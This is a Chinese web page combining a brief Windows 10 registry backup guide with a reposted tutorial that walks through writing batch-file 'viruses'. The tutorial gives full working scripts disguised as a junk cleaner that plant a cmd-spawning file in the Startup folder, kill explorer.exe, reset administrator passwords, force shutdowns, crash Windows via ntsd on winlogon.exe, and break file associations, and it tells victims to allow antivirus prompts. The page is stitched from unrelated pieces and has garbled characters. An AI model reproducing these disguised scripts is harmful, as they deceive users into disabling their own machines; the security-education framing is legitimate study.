Win10預(yù)覽版怎么備份和還原注冊表以防某些誤操作
通過修改注冊表改變某些設(shè)置���,是Win10中經(jīng)常操作的,比如解鎖Win10新版時(shí)鐘應(yīng)用��。每次修改注冊表前��,都會(huì)建議備份注冊表以便出現(xiàn)問題后可以及時(shí)恢復(fù)注冊表�����。Win10中如何備份注冊表?如何恢復(fù)注冊表?
備份整個(gè)注冊表
打開注冊表編輯器��,在左側(cè)列表中選中根部的"計(jì)算機(jī)"�����,然后點(diǎn)擊"文件"菜單�,選擇"導(dǎo)出"����。如圖: 網(wǎng)絡(luò)綜合布線
然后就會(huì)彈出"導(dǎo)出注冊表文件"對話框���。如圖:
選擇好保存位置���,輸入文件名���,點(diǎn)擊"保存"按鈕即可把注冊表備份為一個(gè)reg文件����。
還有一種方法就是下面的備份某一項(xiàng)時(shí)在"導(dǎo)出注冊表文件"窗口中把"導(dǎo)出范圍"選擇"全部"也可以備份整個(gè)注冊表。
備份注冊表中的某一項(xiàng)(某個(gè)分支)
但注冊表很龐大�����,而你修改的只是其中項(xiàng)�����,所以通常沒有必要備份整個(gè)注冊表����,只需備份你修改的那一項(xiàng)即可�。
在注冊表編輯器中選中需要備份的項(xiàng),在該項(xiàng)上點(diǎn)擊右鍵�,選擇"導(dǎo)出"�。如圖:
同樣會(huì)彈出"導(dǎo)出注冊表文件"對話框����。如圖:
只不過下面的"導(dǎo)出范圍"選中的是"所選分支",這個(gè)時(shí)候你也可以改選中"全部"��,那么備份的就是整個(gè)注冊表了。
選擇好保存位置����,輸入文件名,點(diǎn)擊"保存"按鈕即可把選中的注冊表項(xiàng)備份為一個(gè)reg文件�����。如圖:
恢復(fù)注冊表的方法
方法一: 云郵箱 云服務(wù)器
打開注冊表編輯器����,點(diǎn)擊"文件"菜單,選擇"導(dǎo)入"���,然后在"導(dǎo)入注冊表"窗口中選擇之前備份的reg文件。如圖:
點(diǎn)擊"打開"�����,即可導(dǎo)入��,然后會(huì)彈出"….reg中包含的項(xiàng)和值已成功添加到注冊表中"的提示����。如圖:
點(diǎn)擊"確定"即可����。
方法二:
無需打開注冊表編輯器,直接雙擊之前備份的reg文件�����,就會(huì)彈出警告對話框"添加信息可能會(huì)在無意中更改或刪除值并導(dǎo)致組件無法繼續(xù)工具���。如果你不信任….reg中此信息的來源��,請不要將其添加到注冊表中��。確定繼續(xù)嗎����?"如圖:
點(diǎn)擊"是",就會(huì)向注冊表中添加信息,然后彈出"….reg中包含的項(xiàng)和值已成功添加到注冊表中"的提示����。如圖:
點(diǎn)擊"確定"即可�����。
注冊表其實(shí)只是計(jì)算機(jī)配置的數(shù)據(jù),也就是計(jì)算機(jī)設(shè)置的內(nèi)容,比如記錄記算機(jī)怎么顯示���、文件怎么關(guān)聯(lián)之類的信息,一般注冊表無任何命令或程序成分,說白了它只是個(gè)數(shù)據(jù)��。
IT外包電腦維修網(wǎng)絡(luò)維護(hù)方面知識(shí)請了解北京艾銻無限官網(wǎng)��,點(diǎn)擊下方更多有專屬人員為您全程服務(wù)
【編者按】病毒這個(gè)不速之客讓人談之色變�,它像一個(gè)藏在斗篷俠下的黑衣人�,被“光顧”的人就會(huì)倒霉。本文為作者的網(wǎng)絡(luò)安全自學(xué)教程系列文章之一,將講解簡單的病毒原理知識(shí),并通過批處理代碼制作病毒,包括自動(dòng)啟���、修改密碼、定時(shí)關(guān)機(jī)、藍(lán)屏�、進(jìn)程關(guān)閉等功能��。希望這篇基礎(chǔ)文章對大家有所幫助,更希望大家提高安全意識(shí),學(xué)會(huì)相關(guān)防范,也歡迎大家討論�。
作者 | 楊秀璋
責(zé)編 | 夕顏
本文授權(quán)轉(zhuǎn)載自CSDN博客專家Eastmount
聲明:本人堅(jiān)決反對利用教學(xué)方法進(jìn)行犯罪的行為�,一切犯罪行為必將受到嚴(yán)懲����,綠色網(wǎng)絡(luò)需要我們共同維護(hù),更推薦大家了解它們背后的原理,更好地進(jìn)行防護(hù)。
一.關(guān)機(jī)bat腳本
計(jì)算機(jī)病毒(Computer Virus)是編制者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者數(shù)據(jù)的代碼,能影響計(jì)算機(jī)使用,能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼�。計(jì)算機(jī)病毒具有傳播性����、隱蔽性��、感染性、潛伏性�、可激發(fā)性����、表現(xiàn)性或破壞性。
計(jì)算機(jī)病毒的生命周期:開發(fā)期→傳染期→潛伏期→發(fā)作期→發(fā)現(xiàn)期→消化期→消亡期。計(jì)算機(jī)病毒是一個(gè)程序,一段可執(zhí)行碼。就像生物病毒一樣��,具有自我繁殖�����、互相傳染以及激活再生等生物病毒特征�����。計(jì)算機(jī)病毒有獨(dú)特的復(fù)制能力,它們能夠快速蔓延,又常常難以根除��。它們能把自身附著在各種類型的文件上��,當(dāng)文件被復(fù)制或從一個(gè)用戶傳送到另一個(gè)用戶時(shí)��,它們就隨同文件一起蔓延開來。
下面講解第一個(gè)批處理腳本,主要是調(diào)用“shutdown”實(shí)現(xiàn)關(guān)機(jī)��。其基本步驟如下:
新建文本文檔
輸入 shutdown -s -t 600
把txt改成bat
如下圖所示�,運(yùn)行CMD可以查看shutdown命令的基本用法。
基本命令為:
1 shutdown -s -t 600
2//現(xiàn)在讓系統(tǒng)600秒之后關(guān)機(jī)
3
4shutdown -a
5//終止關(guān)閉計(jì)算機(jī)
運(yùn)行結(jié)果如下圖所示:
新建“test.bat”并填寫“ shutdown -s -t 600”,某些系統(tǒng)需要在“文件夾選項(xiàng)”中,顯示“隱藏已知文件類型的擴(kuò)展名”�。
雙擊BAT文件即運(yùn)行關(guān)機(jī)��,如果需要取消,還是在CMD黑框中輸入“shutdown -a”命令�。
二.修改密碼和定時(shí)關(guān)機(jī)病毒
接下來分享一個(gè)比較完整的病毒制作過程����。
第一步��,新建game.bat文件�。
程序編寫如下所示���,其中“@echo off”表示關(guān)閉回顯�����,“color 0a”表示設(shè)置顏色。
1 @echo off
2color 0a
3title Eastmount程序
4
5echo===================================
6echo 菜單
7echo 1.修改管理員密碼
8echo 2.定時(shí)關(guān)機(jī)
9echo 3.退出本程序
10echo===================================
11
12pause
運(yùn)行結(jié)果如下圖所示�����,可以看到標(biāo)題為“Eastmount程序”�����,并且包含相關(guān)內(nèi)容���,這就是批處理文件執(zhí)行過程�����。
第二步,做一個(gè)選擇判斷���,該程序需要和用戶進(jìn)行互動(dòng)。
核心代碼為“set /p num=您的選擇是:”���,其表示設(shè)置變量num,“/p”表示暫停并等待用戶輸入�����,用戶最終輸入的值賦為num�����。
1 @echo off
2color 0a
3title Eastmount程序
4
5echo===================================
6echo 菜單
7echo 1.修改管理員密碼
8echo 2.定時(shí)關(guān)機(jī)
9echo 3.退出本程序
10echo===================================
11
12set /p num=您的選擇是:
13
14pause
輸出結(jié)果如下圖所示:
第三步,補(bǔ)充修改管理員密碼�����、定時(shí)關(guān)機(jī)����、退出等命令�。
修改管理員密碼的命令是微軟所有系統(tǒng)的通用命令�,下述代碼是修改當(dāng)前管理員密碼為“123456”。
1 net user administrator 123456
第二個(gè)選項(xiàng)是關(guān)機(jī)���,命令如下:
1 shutdown -s -t 100
第三個(gè)選項(xiàng)是退出本程序。
1 exit
接著編寫判斷和跳轉(zhuǎn)批處理代碼�����,代碼如下所示���,“>nul”表示不輸出運(yùn)行提示信息����。
1 @echo off
2color 0a
3title Eastmount程序
4
5:menu
6echo===================================
7echo 菜單
8echo 1.修改管理員密碼
9echo 2.定時(shí)關(guān)機(jī)
10echo 3.退出本程序
11echo===================================
12
13set /p num=您的選擇是:
14if "%num%"=="1" goto 1
15if "%num%"=="2" goto 2
16if "%num%"=="3" goto 3
17
18:1
19net user administrator 123456 > nul
20echo 您的密碼已經(jīng)設(shè)置成功!
21pause
22goto menu
23
24:2
25shutdown -s -t 100
26goto menu
27
28:3
29exit
此時(shí)輸入“1”會(huì)提示系統(tǒng)錯(cuò)誤���,如下圖所示:
同時(shí),殺毒軟件也會(huì)提示黑客修改電腦��,點(diǎn)擊“允許操作”即可��,
接著增加“cls”命令清屏�。同時(shí)�����,為了避免輸入數(shù)字“4”會(huì)從頭執(zhí)行到尾,補(bǔ)充一個(gè)提示信息。代碼修改如下:
1 @echo off
2color 0a
3title Eastmount程序
4
5:menu
6cls
7echo===================================
8echo 菜單
9echo 1.修改管理員密碼
10echo 2.定時(shí)關(guān)機(jī)
11echo 3.退出本程序
12echo===================================
13
14set /p num=您的選擇是:
15if "%num%"=="1" goto 1
16if "%num%"=="2" goto 2
17if "%num%"=="3" goto 3
18
19echo 您好��!請輸入1-3正確的數(shù)字
20pause
21goto menu
22
23:1
24net user administrator 123456 >nul
25echo 您的密碼已經(jīng)設(shè)置成功��!
26pause
27goto menu
28
29:2
30shutdown -s -t 100
31goto menu
32
33:3
34exit
此時(shí)運(yùn)行如下圖所示:
繼續(xù)修改代碼���,補(bǔ)充設(shè)置的用戶名和新密碼���,關(guān)機(jī)時(shí)間等��。
1 @echo off
2color 0a
3title Eastmount程序
4
5:menu
6cls
7echo===================================
8echo 菜單
9echo 1.修改管理員密碼
10echo 2.定時(shí)關(guān)機(jī)
11echo 3.退出本程序
12echo===================================
13
14set /p num=您的選擇是:
15if "%num%"=="1" goto 1
16if "%num%"=="2" goto 2
17if "%num%"=="3" goto 3
18
19echo 您好!請輸入1-3正確的數(shù)字
20pause
21goto menu
22
23:1
24set /p u=請輸入用戶名:
25set /p p=請輸入新密碼:
26net user %u% %p% >nul
27echo 您的密碼已經(jīng)設(shè)置成功!
28pause
29goto menu
30
31:2
32set /p time=請輸入時(shí)間:
33shutdown -s -t %time%
34goto menu
35
36:3
37exit
以“管理員身份運(yùn)行”后�,成功修改“xiuzhang”用戶的開機(jī)密碼���。
輸入2可以設(shè)置關(guān)機(jī)時(shí)間�����,這里就不再贅述,第一部分已經(jīng)詳細(xì)講解。
三.自啟動(dòng)死機(jī)病毒
接著編寫一個(gè)偽裝成“系統(tǒng)垃圾清理”的代碼�����,它其實(shí)是一個(gè)導(dǎo)致系統(tǒng)死機(jī)的代碼���,也不能算是“病毒”�,更多是一個(gè)惡作劇程序。其原理是不斷打開CMD程序,占用系統(tǒng)資源從而導(dǎo)致死機(jī),并且每次開機(jī)都會(huì)自動(dòng)啟���。
PS:這里強(qiáng)調(diào)一句,建議大家在虛擬機(jī)中運(yùn)行該代碼。我們作為安全工程師��,希望您們?nèi)チ私饴┒幢澈蟮脑?��,更好地進(jìn)行防御����,綠色網(wǎng)絡(luò)需要我們共同維護(hù)�,杜絕一切違法行為。
第一步����,在C:\windows目錄下創(chuàng)建文件“windows.bat”��。一個(gè)“>”表示覆蓋文件內(nèi)容,兩個(gè)“>>”表示追加一句話至文件末尾�。
1echo start cmd >c:\windows\windows.bat
2echo %0>>c:\windows\windows.bat
用戶打開這個(gè)程序之后�,程序就會(huì)不斷打開cmd���,占用系統(tǒng)資源,導(dǎo)致系統(tǒng)癱瘓����,%0是再次執(zhí)行該程序的意思�。但是����,這樣只能讓用戶死機(jī)一次,重啟系統(tǒng)以后,不再打開這個(gè)文件以后,就不再會(huì)中招了�。
第二步�����,將這個(gè)惡意腳本放到開機(jī)菜單中,每次開機(jī)都自動(dòng)啟動(dòng)運(yùn)行并導(dǎo)致電腦死機(jī)。
errorlevel為預(yù)定義變量,隨著系統(tǒng)變化而變化。如果為0表示上一條命令執(zhí)行成功�����,如果非0表示上一條命令執(zhí)行失敗�,它不是Win7系統(tǒng),而執(zhí)行下面這條命令(XP系統(tǒng)、2003系統(tǒng))。
代碼“echo.”表示空行��,比如代碼:
輸出結(jié)果如下圖所示:
第三步��,接著編寫next區(qū)域代碼,完整代碼如下所示����。
1@echo off
2title 系統(tǒng)垃圾清理
3color 2f
4echo=====若有殺毒軟件惡意攔截�,請選擇【允許程序的所有操作】====
5echo.
6echo.
7
8echo start cmd >c:\windows\windows.bat
9::echo %%0>>c:\windows\windows.bat
10
11copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul
12if %errorlevel%==0 goto next
13
14copy c:\windows\windows.bat "%USERPROFILE%\「開始」菜單\程序\啟動(dòng)\">nul
15if %errorlevel%==1 goto error
16
17:next
18echo.
19echo.
20echo=====垃圾清理中�,請不要關(guān)閉窗口=========
21echo.
22ping -n 5 127.0.0.1>nul
23echo.
24echo=====垃圾清理完畢,共清理垃圾500M=======
25echo.
26echo.
27echo=====建議立即重啟電腦==========
28pause
29
30:error
31echo.
32echo.
33echo======程序運(yùn)行失敗,請【使用管理員權(quán)限】重新運(yùn)行�����!========
34echo.
35pause
注意��,我注釋了重復(fù)操作代碼“::echo %%0>>c:\windows\windows.bat”��,否則開機(jī)自啟動(dòng)很麻煩。接著運(yùn)行代碼����,如下圖所示��,需要右鍵“以管理員身份運(yùn)行”。
代碼會(huì)在C:\windwos目錄下創(chuàng)建批處理文件“windows.bat”�����。
同時(shí)�����,在我的Win10系統(tǒng)開機(jī)自動(dòng)動(dòng)目錄下也有該文件�����。
目錄:…\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
打開該文件可以看到寫入的“start cmd”代碼���,表示打開CMD����。
雙擊該“windows.bat”文件,運(yùn)行結(jié)果如下圖所示。
總結(jié):本文編寫了一個(gè)系統(tǒng)清理工具�,其實(shí)是把這個(gè)windows.bat寫到用戶的開機(jī)自啟動(dòng)目錄下���,達(dá)到用戶每次開機(jī)��,都會(huì)運(yùn)行該程序的目的,重復(fù)調(diào)用CMD占用資源。如果中了該病毒,用戶可以使用PE到開啟啟動(dòng)目錄把windows.bat文件刪除����,或者重裝系統(tǒng)����,再次建議大家別讓它重復(fù)運(yùn)行�。
四.進(jìn)程關(guān)閉病毒
再看一個(gè)偽裝垃圾清理的批處理代碼。該命令是殺死進(jìn)程,“/im explorer.exe”表示要?dú)⑺赖倪M(jìn)程名稱����,關(guān)閉桌面���;“/f”表示強(qiáng)制殺死�;“>nul”表示在屏幕上不要輸出任何信息。
1taskkill /im explorer.exe /f >nul 2>nul
完整代碼如下所示�,其中“Start c:\windows\expolrer.exe”表示繼續(xù)開啟桌面�����,“ping -n 5 127.0.0.1>nul”用于消耗時(shí)間。
1@echo off
2title 系統(tǒng)垃圾清理
3color 2f
4echo=====若有殺毒軟件惡意攔截����,請選擇【允許程序的所有操作】====
5echo.
6echo.
7echo.
8echo=====垃圾清理中,請不要關(guān)閉窗口=========
9echo.
10ping -n 5 127.0.0.1>nul
11taskkill /im explorer.exe /f >nul 2>nul
12echo.
13echo=====拐了,你的系統(tǒng)已經(jīng)廢了=======
14echo.
15ping -n 5 127.0.0.1>nul
16echo.
17Start c:\windows\explorer.exe
18echo.
19echo=====已經(jīng)修復(fù)好���!是不是嚇壞了!!O(∩_∩)O==========
20pause
運(yùn)行該批處理程序���,桌面會(huì)消失,如下圖所示。
過一會(huì)桌面又會(huì)恢復(fù)��。由于作者桌面東西太亂���,這里僅顯示壁紙展示��。
五.最簡單的藍(lán)屏炸彈文件
新建文本文檔
輸入:ntsd -c q -pn winlogon.exe�����,表示強(qiáng)制殺死進(jìn)程
工具->文件夾選項(xiàng)->查看->“隱藏已知文件類型的擴(kuò)展名”勾選
txt修改為bat
開始->程序->啟動(dòng),打開game.bat文件
黑客很少攻擊個(gè)人,一般攻擊服務(wù)器���,該命令對2003的服務(wù)器特別有殺傷力
雙擊之后,服務(wù)器直接藍(lán)屏顯示并重啟。
ntsd從Windows 2000開始就是系統(tǒng)自帶的進(jìn)程調(diào)試工具��,在system32目錄下�����。ntsd的功能非常的強(qiáng)大��,用法也比較復(fù)雜,但如果只用來結(jié)束一些進(jìn)程,那就比較簡單了。在Windows中只有System�、SMSS.EXE和CSRSS.EXE不能殺�����。前兩個(gè)是純內(nèi)核態(tài)的,最后那個(gè)是Win32子系統(tǒng),ntsd本身需要它。lsass.exe也不要?dú)⒌簦秦?fù)責(zé)本地賬戶安全的�。被調(diào)試器附著的進(jìn)程會(huì)隨調(diào)試器一起退出�,所以可以用來在命令行下終止進(jìn)程�。
打開cmd 后輸入以下命令就可以結(jié)束進(jìn)程:
命令格式:ntsd -c q -p pid
命令范例:ntsd -c q -p 1332 (結(jié)束explorer.exe進(jìn)程)
范例詳解:explorer.exe的pid為1332���,但是如何獲取進(jìn)程的pid呢����?在CMD下輸入TASKLIST就可以獲取當(dāng)前任務(wù)管理器所有進(jìn)程的PID?�;蛘叽蜷_任務(wù)管理器��,在菜單欄�����,選擇“查看”->“選擇列”,在打開的選擇項(xiàng)窗口中將“PID(進(jìn)程標(biāo)識(shí)符)”項(xiàng)選擇鉤上�����,這樣任務(wù)管理器的進(jìn)程中就會(huì)多出PID一項(xiàng)了���。PID的分配并不固定��,是在進(jìn)程啟動(dòng)是由系統(tǒng)隨機(jī)分配的���,所以進(jìn)程每次啟動(dòng)的進(jìn)程一般都不會(huì)一樣����。
命令格式:ntsd -c q -pn xxxx.exe (xxxx.exe 為進(jìn)程名,exe不能?��。?/p>
命令范例:ntsd -c q -pn explorer.exe
另外的能結(jié)束進(jìn)程的DOS命令還有taskkill和tskill命令。
六.最簡單的擴(kuò)展名病毒
將文件格式修改或文檔加密都是常見的病毒�,比如永恒之藍(lán)����、勒索病毒等���,它們就是將電腦內(nèi)的所有資料��、文檔加密,當(dāng)你要打開文件時(shí)�,需要密碼����,此時(shí)通過比特幣付費(fèi)進(jìn)行勒索�����。
下面這個(gè)小操作是將exe文件修改為txt文檔�����。當(dāng)遇到可執(zhí)行的exe文件,會(huì)認(rèn)為它是一個(gè)txt文檔���,用記事本打開,導(dǎo)致可執(zhí)行程序運(yùn)行不起來���,這是就是這個(gè)病毒的原理。
雙擊運(yùn)行bat文件之后���,我們的可執(zhí)行文件就變成了txt文件��。此時(shí)系統(tǒng)認(rèn)為exe就是txt程序,把系統(tǒng)的關(guān)聯(lián)搞混亂了���,它恢復(fù)起來很麻煩。
EXE程序打開如下圖所示����。
甚至打開CMD都是TXT文本文件。
接著需要執(zhí)行下面的命令還原exe文件。
還原的代碼及效果如下圖所示。
其他所有文件格式都轉(zhuǎn)換為txt文件�,如下所示���。此時(shí)�����,如果隱藏文件擴(kuò)展名,甚至可以修改圖標(biāo)偽裝成目標(biāo)應(yīng)用,當(dāng)用戶點(diǎn)擊時(shí)會(huì)執(zhí)行這些破壞����;但由于不知道目標(biāo)是否有隱藏文件擴(kuò)展名���,還是不建議這種“笨”方法�。
1assoc .htm=txtfile
2assoc .dat=txtfile
3assoc .com=txtfile
4assoc .rar=txtfile
5assoc .gho=txtfile
6assoc .mvb=txtfile
7...
解決方法:
如果您不幸中了該病毒�,怎么解決呢?如下圖所示,還原所有正確關(guān)聯(lián)即可�����。
PS:還有一些病毒�,比如VBS腳本、網(wǎng)頁彈窗(網(wǎng)站釣魚)等,這里不再講解�����,推薦讀者閱讀前文“[網(wǎng)絡(luò)安全自學(xué)篇] 二十五.Web安全學(xué)習(xí)路線及木馬�、病毒和防御初探”。如果把病毒程序放到啟動(dòng)項(xiàng),每次開機(jī)都會(huì)自動(dòng)執(zhí)行��。
七.總結(jié)
希望這系列文章對您有所幫助�,真的感覺自己技術(shù)好菜,要學(xué)的知識(shí)好多。這是第44篇原創(chuàng)的安全系列文章�,從網(wǎng)絡(luò)安全到系統(tǒng)安全��,從木馬病毒到后門劫持����,從惡意代碼到溯源分析��,從滲透工具到二進(jìn)制工具,還有Python安全、頂會(huì)論文���、黑客比賽和漏洞分享。未知攻焉知防,人生漫漫其路遠(yuǎn)兮�,作為初學(xué)者�,自己真是爬著前行�����,感謝很多人的幫助�,繼續(xù)爬著���,繼續(xù)加油�����!
歡迎大家討論�����,是否覺得這系列文章幫助到您!任何建議都可以評(píng)論告知讀者���,共勉。
俠之為大��,為國為民�。向一線醫(yī)護(hù)人員、軍人���、工人、科學(xué)家和所有工作者致敬。咱們中國人一生的最高追求��,為天地立心�,為生民立命�����,為往圣繼絕學(xué)���,為萬世開太平�����,他們真的做到了。生活哪有什么歲月靜好�����,只不過這些人替我們負(fù)重前行�。希望每一個(gè)人都健康平安,戴口罩不出門��,勤洗手多吃飯��。武漢加油���,湖北加油�����,中國加油。眾志成城���,加油必勝!?�?���!
原文鏈接:
https://blog.csdn.net/Eastmount/article/details/104146757
